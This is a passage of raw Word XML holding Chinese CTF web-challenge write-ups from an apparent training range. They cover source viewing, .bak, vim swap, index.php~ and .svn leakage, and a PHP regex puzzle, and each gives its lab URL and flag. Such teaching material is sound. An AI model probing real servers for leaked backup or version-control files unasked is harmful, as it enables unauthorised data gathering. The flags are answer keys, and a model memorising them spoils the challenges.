          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC69FF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581650" cy="3333750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98" name="图片 98" descr="http://192.168.109.235/storage/images/201903131517412V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http://192.168.109.235/storage/images/201903131517412Vf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A02" w:rsidRPr="00AC69FF" w:rsidRDefault="002A4A02" w:rsidP="002A4A02">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="002A4A02">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SUCTF{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A4A02">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fake_flag_web_a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A4A02">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>签到了</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看源码</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>信息获取</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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/183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获取的信息，得到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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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直接查看源码即可</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="002A4A02" w:rsidP="002A4A02">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A4A02">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Welcome_To_CTF_World</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="00C31A49" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>条命您配吗</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息获取</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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/184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获取的信息，得到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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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直接查阅</w:t>
      </w:r>
      <w:r w:rsidRPr="006B71DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>main.js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可以拿到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或者</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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556242" cy="3476463"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="100" name="图片 100" descr="http://192.168.109.235/storage/images/20190313165044yG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http://192.168.109.235/storage/images/20190313165044yG5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581" cy="349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17B" w:rsidRDefault="0099717B" w:rsidP="0099717B"/>
    <w:p w:rsidR="002A4A02" w:rsidRPr="0099717B" w:rsidRDefault="002A4A02" w:rsidP="002A4A02">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="002A4A02">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>haha_u_get_30HP_now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31A49" w:rsidRDefault="00C31A49" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件泄露</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息隐藏</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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/187,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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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：打开目标网址</w:t>
      </w:r>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://60.10.10.21/187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 (IP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地址以实际获取的为准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</w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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4893106" cy="937377"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="102" name="图片 102" descr="http://192.168.109.235/storage/images/20181227171054J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http://192.168.109.235/storage/images/20181227171054JAN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613" cy="95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17B" w:rsidRDefault="0099717B" w:rsidP="002A4A02">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:afterAutospacing="1" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480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：题目显示</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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推测可能是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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文件泄露，打开浏览器在地址加入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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B71DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>index.php.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，看看有没有隐藏文件，得到本题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97031" cy="1927472"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101" name="图片 101" descr="http://192.168.109.235/storage/images/20181227171101R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http://192.168.109.235/storage/images/20181227171101RST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645" cy="193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A02" w:rsidRPr="002A4A02" w:rsidRDefault="002A4A02" w:rsidP="002A4A02">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="002A4A02">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>flag{63d0cea9d550e495fde1b81310951bd7}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31A49" w:rsidRDefault="00C31A49" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bolangxian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息泄露</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息隐藏</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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/188,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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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：打开目标网址</w:t>
      </w:r>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://60.10.10.21/188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 (IP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地址以实际获取的为准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</w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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2657475" cy="1323975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="104" name="图片 104" descr="http://192.168.109.235/storage/images/20181227172002Yo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http://192.168.109.235/storage/images/20181227172002Yoi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17B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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：题目信息比较简单，怀疑可能是信息泄露，打开浏览器在地址栏输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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~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试试是否能得出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99717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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762500" cy="2076450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="103" name="图片 103" descr="http://192.168.109.235/storage/images/20181227172010g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://192.168.109.235/storage/images/20181227172010gRd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A02" w:rsidRPr="0099717B" w:rsidRDefault="002A4A02" w:rsidP="002A4A02">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="002A4A02">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>flag{8a3053357a2508363add4edb0cda8f2b}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31A49" w:rsidRDefault="00C31A49" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>use_vim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数传递</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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/193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获取的相应信息，通过传递参数得到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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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lastRenderedPageBreak/>
        <w:t>Write-up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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9717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99717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99717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打开浏览器，输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="0099717B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&lt;http://192.168.15.28/193&gt;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99717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99717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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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181600" cy="2752725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="107" name="图片 107" descr="http://192.168.109.235/storage/images/28caa072292b8f37728bd0b20a9296ff/2018-12-27-14-56-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http://192.168.109.235/storage/images/28caa072292b8f37728bd0b20a9296ff/2018-12-27-14-56-27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17B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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9717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99717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99717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访问题目链接，可以看到一句话：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I use vim to write flags, but suddenly the power is off. . . .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从这句话中提取出一个信息，使用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vim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编辑器，使用过程中发生意外中断。于是想到是不是让我们查看缓存文件。没有找到</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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8201025" cy="3438525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="106" name="图片 106" descr="http://192.168.109.235/storage/images/28caa072292b8f37728bd0b20a9296ff/2018-12-27-14-56-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http://192.168.109.235/storage/images/28caa072292b8f37728bd0b20a9296ff/2018-12-27-14-56-57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10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17B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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9717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99717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99717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于是我们试试另一个文件</w:t>
      </w:r>
      <w:r w:rsidRPr="006B71DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B71DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>index.php.swo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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690360" cy="2767217"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="105" name="图片 105" descr="http://192.168.109.235/storage/images/28caa072292b8f37728bd0b20a9296ff/2018-12-27-14-57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http://192.168.109.235/storage/images/28caa072292b8f37728bd0b20a9296ff/2018-12-27-14-57-07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5859" cy="276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ABC" w:rsidRPr="0099717B" w:rsidRDefault="00207ABC" w:rsidP="00207ABC">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00207ABC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>912ec803b2ce49e4a541068d495ab570</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31A49" w:rsidRDefault="00C31A49" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>forgot_something</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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Cs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>靶场简介</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>svn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>泄露的信息</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息隐藏</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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/196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获取的信息，通过相应方法得到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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svn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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泄露的信息，并且得到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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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9717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99717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99717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打开浏览器，输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="0099717B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&lt;http://192.168.15.28/196/&gt;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99717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99717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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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189443" cy="2765802"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="110" name="图片 110" descr="http://192.168.109.235/storage/images/1e82e69475038dafcba91ee87ff21d3b/2018-12-27-15-27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://192.168.109.235/storage/images/1e82e69475038dafcba91ee87ff21d3b/2018-12-27-15-27-03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467" cy="27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99717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99717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99717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这个题目考察的是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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svn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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泄露，在访问地址后面添加上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.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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svn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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然后访问一下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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4992392" cy="2534017"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="109" name="图片 109" descr="http://192.168.109.235/storage/images/1e82e69475038dafcba91ee87ff21d3b/2018-12-27-15-27-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http://192.168.109.235/storage/images/1e82e69475038dafcba91ee87ff21d3b/2018-12-27-15-27-43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155" cy="254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99717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99717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99717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看到确实可以访问到这个目录，然后这个目录下面有个文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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2956914" cy="1569720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="108" name="图片 108" descr="http://192.168.109.235/storage/images/1e82e69475038dafcba91ee87ff21d3b/2018-12-27-15-27-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://192.168.109.235/storage/images/1e82e69475038dafcba91ee87ff21d3b/2018-12-27-15-27-59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205" cy="1599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ABC" w:rsidRDefault="00207ABC" w:rsidP="00207ABC">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00207ABC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>6ded31434fc9a9472b24da4ecbd4a4db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00207ABC" w:rsidRPr="0099717B" w:rsidRDefault="00207ABC" w:rsidP="0099717B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</w:p>
    <w:p w:rsidR="00C31A49" w:rsidRDefault="0099717B" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidR="00C31A49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hengze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正则匹配内容</w:t>
      </w:r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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正则表达式匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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/198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获取的信息，使用相应的方法对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PHP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正则匹配，得到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99717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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9717B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lastRenderedPageBreak/>
        <w:t>Write-up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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99717B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://10.10.23.105/198/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(IP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地址以实际获取的为准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访问如图。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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45369" cy="1196730"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="115" name="图片 115" descr="http://192.168.109.235/storage/images/35fa7f7a7834ceb8e3a71f52a2236271/2018-12-27-15-35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://192.168.109.235/storage/images/35fa7f7a7834ceb8e3a71f52a2236271/2018-12-27-15-35-1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517" cy="121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：本题考查对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PHP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正则匹配的理解，需要依照题目解出匹配的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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848225" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="114" name="图片 114" descr="http://192.168.109.235/storage/images/35fa7f7a7834ceb8e3a71f52a2236271/2018-12-27-15-35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http://192.168.109.235/storage/images/35fa7f7a7834ceb8e3a71f52a2236271/2018-12-27-15-35-21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：正则表达式语法解出其中一种内容表达式为。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="405" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hongyaahongyaaaaahongyaaa:/a/ahongya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5133975" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="113" name="图片 113" descr="http://192.168.109.235/storage/images/35fa7f7a7834ceb8e3a71f52a2236271/2018-12-27-15-35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://192.168.109.235/storage/images/35fa7f7a7834ceb8e3a71f52a2236271/2018-12-27-15-35-28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717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：下一步打开火狐浏览器，需要安装</w:t>
      </w:r>
